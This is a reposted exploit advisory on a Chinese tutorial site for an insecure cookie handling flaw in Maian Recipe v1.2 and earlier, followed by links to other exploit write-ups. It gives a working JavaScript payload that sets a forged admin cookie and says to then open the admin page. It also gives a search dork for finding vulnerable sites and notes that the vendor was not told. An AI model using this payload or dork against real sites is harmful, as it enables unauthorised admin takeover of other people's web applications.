手机
当前位置:查字典教程网 >网络安全 >Exploit >Maian Recipe
Maian Recipe
摘要:-[*]==================================================================...

-[*] ================================================================================ [*]-

-[*] Maian Recipe <= v1.2 Insecure Cookie Handling Vulnerability [*]-

-[*] ================================================================================ [*]-

[*] Discovered By: S.W.A.T.

[*] E-Mail: svvateam[at]yahoo[dot]com

[*] Script Download: http://www.maianscriptworld.co.uk

[*] DORK: Powered by: Maian Recipe v1.2

[*] Vendor Has Not Been Notified!

[*] DESCRIPTION:

Maian Recipe suffers from a insecure cookie, the admin panel only checks if the cookie

exists.

and not the content. so we can easyily craft a cookie and look like a admin.

[*] Vulnerability:

javascript:document.cookie = "recipe_cookie=1; path=/";

[*] NOTE/TIP:

after running the javascript, visit "/admin/index.php" to view admin area.

-[*] ================================================================================ [*]-

-[*] Maian Recipe <= v1.2 Insecure Cookie Handling Vulnerability [*]-

-[*] ================================================================================ [*]-

【Maian Recipe】相关文章:

MFORUM 0.1a Arbitrary Add-Admin Vulnerability

Maian Music 1.0 Insecure Cookie Handling Vulnerability

Maian Weblog

Joomla Component DT Register Remote SQL injection Vulnerability

minb 0.1.0 Remote Code Execution Exploit

HIOX Random Ad 1.3 Arbitrary Add Admin User Exploit

webEdition CMS (we_objectID) Blind SQL Injection Exploit

WarFTP 1.65 (USER) Remote Buffer Overlow Exploit

PPMate PPMedia Class ActiveX Control Buffer Overflow PoC

Ultra Office ActiveX Control Remote Buffer Overflow Exploit

精品推荐
分类导航